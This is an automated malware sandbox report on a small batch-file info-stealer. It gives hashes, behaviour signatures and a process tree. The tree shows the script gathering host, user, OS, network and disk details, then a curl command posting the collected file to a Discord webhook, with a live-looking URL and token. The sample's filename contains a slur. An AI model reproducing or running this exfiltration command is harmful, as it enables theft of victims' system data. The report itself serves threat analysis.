Analysis
- max time kernel: 15s
- max time network: 17s
- platform: windows10-ltsc_2021_x64
- resource: win10ltsc2021-20250314-en
- resource tags: arch:x64, arch:x86, image:win10ltsc2021-20250314-en, locale:en-us, os:windows10-ltsc_2021-x64, system
- submitted: 01/04/2025, 14:40

Static task: static1
Behavioral task: behavioral1
- Sample: niggagimeinfo.bat
- Resource: win10ltsc2021-20250314-en
- 10 signatures
- 150 seconds
General
- Target: niggagimeinfo.bat
- Size: 732B
- MD5: a874910a487c124be0f303e1c626091c
- SHA1: 1f160820d42a658baf7b4fa3759847d2acdef6a0
- SHA256: c6c4ab9000f281ecd77ca3a6bc7d1c9844c5d28bb19a8ee416a8c6cc1e597987
- SHA512: df0381058099400a48f1e63f22141d9a0f385a6ab427df4ecc55331f85347a6ebb0d4eecca3491a39496bc91098ef3efffce941f3e03ced308505da565ff9041
Malware Config
Signatures
- Hawkeye family
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
  flow | ioc
  17 | discord.com
  18 | discord.com
- Collects information from the system (1 TTPs, 1 IoCs)
  Uses WMIC.exe to find detailed system information.
  pid | Process
  4504 | WMIC.exe
- Gathers network information (2 TTPs, 2 IoCs)
  Uses commandline utility to view network configuration.
  pid | Process
  3404 | ipconfig.exe
  5724 | ipconfig.exe
- Gathers system information (1 TTPs, 1 IoCs)
  Runs systeminfo.exe.
  pid | Process
  3252 | systeminfo.exe
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid | Process
  4504 | WMIC.exe
  4504 | WMIC.exe
  4504 | WMIC.exe
  4504 | WMIC.exe
- Suspicious use of AdjustPrivilegeToken (43 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 2764 | whoami.exe
  Token: SeIncreaseQuotaPrivilege | 4504 | WMIC.exe
  Token: SeSecurityPrivilege | 4504 | WMIC.exe
  Token: SeTakeOwnershipPrivilege | 4504 | WMIC.exe
  Token: SeLoadDriverPrivilege | 4504 | WMIC.exe
  Token: SeSystemProfilePrivilege | 4504 | WMIC.exe
  Token: SeSystemtimePrivilege | 4504 | WMIC.exe
  Token: SeProfSingleProcessPrivilege | 4504 | WMIC.exe
  Token: SeIncBasePriorityPrivilege | 4504 | WMIC.exe
  Token: SeCreatePagefilePrivilege | 4504 | WMIC.exe
  Token: SeBackupPrivilege | 4504 | WMIC.exe
  Token: SeRestorePrivilege | 4504 | WMIC.exe
  Token: SeShutdownPrivilege | 4504 | WMIC.exe
  Token: SeDebugPrivilege | 4504 | WMIC.exe
  Token: SeSystemEnvironmentPrivilege | 4504 | WMIC.exe
  Token: SeRemoteShutdownPrivilege | 4504 | WMIC.exe
  Token: SeUndockPrivilege | 4504 | WMIC.exe
  Token: SeManageVolumePrivilege | 4504 | WMIC.exe
  Token: 33 | 4504 | WMIC.exe
  Token: 34 | 4504 | WMIC.exe
  Token: 35 | 4504 | WMIC.exe
  Token: 36 | 4504 | WMIC.exe
  Token: SeIncreaseQuotaPrivilege | 4504 | WMIC.exe
  Token: SeSecurityPrivilege | 4504 | WMIC.exe
  Token: SeTakeOwnershipPrivilege | 4504 | WMIC.exe
  Token: SeLoadDriverPrivilege | 4504 | WMIC.exe
  Token: SeSystemProfilePrivilege | 4504 | WMIC.exe
  Token: SeSystemtimePrivilege | 4504 | WMIC.exe
  Token: SeProfSingleProcessPrivilege | 4504 | WMIC.exe
  Token: SeIncBasePriorityPrivilege | 4504 | WMIC.exe
  Token: SeCreatePagefilePrivilege | 4504 | WMIC.exe
  Token: SeBackupPrivilege | 4504 | WMIC.exe
  Token: SeRestorePrivilege | 4504 | WMIC.exe
  Token: SeShutdownPrivilege | 4504 | WMIC.exe
  Token: SeDebugPrivilege | 4504 | WMIC.exe
  Token: SeSystemEnvironmentPrivilege | 4504 | WMIC.exe
  Token: SeRemoteShutdownPrivilege | 4504 | WMIC.exe
  Token: SeUndockPrivilege | 4504 | WMIC.exe
  Token: SeManageVolumePrivilege | 4504 | WMIC.exe
  Token: 33 | 4504 | WMIC.exe
  Token: 34 | 4504 | WMIC.exe
  Token: 35 | 4504 | WMIC.exe
  Token: 36 | 4504 | WMIC.exe
- Suspicious use of WriteProcessMemory (20 IoCs)
  description | pid | Process | procid_target
  PID 5536 wrote to memory of 1564 | 5536 | cmd.exe | 82
  PID 5536 wrote to memory of 1564 | 5536 | cmd.exe | 82
  PID 5536 wrote to memory of 2764 | 5536 | cmd.exe | 83
  PID 5536 wrote to memory of 2764 | 5536 | cmd.exe | 83
  PID 5536 wrote to memory of 3252 | 5536 | cmd.exe | 84
  PID 5536 wrote to memory of 3252 | 5536 | cmd.exe | 84
  PID 5536 wrote to memory of 460 | 5536 | cmd.exe | 85
  PID 5536 wrote to memory of 460 | 5536 | cmd.exe | 85
  PID 5536 wrote to memory of 3404 | 5536 | cmd.exe | 88
  PID 5536 wrote to memory of 3404 | 5536 | cmd.exe | 88
  PID 5536 wrote to memory of 5252 | 5536 | cmd.exe | 89
  PID 5536 wrote to memory of 5252 | 5536 | cmd.exe | 89
  PID 5536 wrote to memory of 5724 | 5536 | cmd.exe | 92
  PID 5536 wrote to memory of 5724 | 5536 | cmd.exe | 92
  PID 5536 wrote to memory of 1464 | 5536 | cmd.exe | 93
  PID 5536 wrote to memory of 1464 | 5536 | cmd.exe | 93
  PID 5536 wrote to memory of 4504 | 5536 | cmd.exe | 94
  PID 5536 wrote to memory of 4504 | 5536 | cmd.exe | 94
  PID 5536 wrote to memory of 5608 | 5536 | cmd.exe | 95
  PID 5536 wrote to memory of 5608 | 5536 | cmd.exe | 95
- cURL User-Agent (1 IoCs)
  Uses User-Agent string associated with cURL utility.
  description | flow | ioc
  HTTP User-Agent header | 18 | curl/8.7.1
Processes
- C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\niggagimeinfo.bat"
  Signatures: Suspicious use of WriteProcessMemory
  PID: 5536
  - C:\Windows\system32\HOSTNAME.EXE
    Command line: hostname
    PID: 1564
  - C:\Windows\system32\whoami.exe
    Command line: whoami
    Signatures: Suspicious use of AdjustPrivilegeToken
    PID: 2764
  - C:\Windows\system32\systeminfo.exe
    Command line: systeminfo
    Signatures: Gathers system information
    PID: 3252
  - C:\Windows\system32\findstr.exe
    Command line: findstr /B /C:"OS Name" /C:"OS Version"
    PID: 460
  - C:\Windows\system32\ipconfig.exe
    Command line: ipconfig
    Signatures: Gathers network information
    PID: 3404
  - C:\Windows\system32\findstr.exe
    Command line: findstr IPv6
    PID: 5252
  - C:\Windows\system32\ipconfig.exe
    Command line: ipconfig
    Signatures: Gathers network information
    PID: 5724
  - C:\Windows\system32\findstr.exe
    Command line: findstr IPv4
    PID: 1464
  - C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic logicaldisk get caption, freespace, size
    Signatures: Collects information from the system; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    PID: 4504
  - C:\Windows\system32\curl.exe
    Command line: curl -X POST https://discord.com/api/webhooks/1356637948279394315/wBsP0ldZy-OklbkGSc8jSiZ8Y16MimqHEj7Ln0Ff1INRHzRS024TSAFclzmg8-DVJw_b -H "Content-Type: application/json" -d "{\"content\": \"```\n$(type "C:\Users\Admin\AppData\Local\Temp\sysinfo.txt")\n```\"}"
    PID: 5608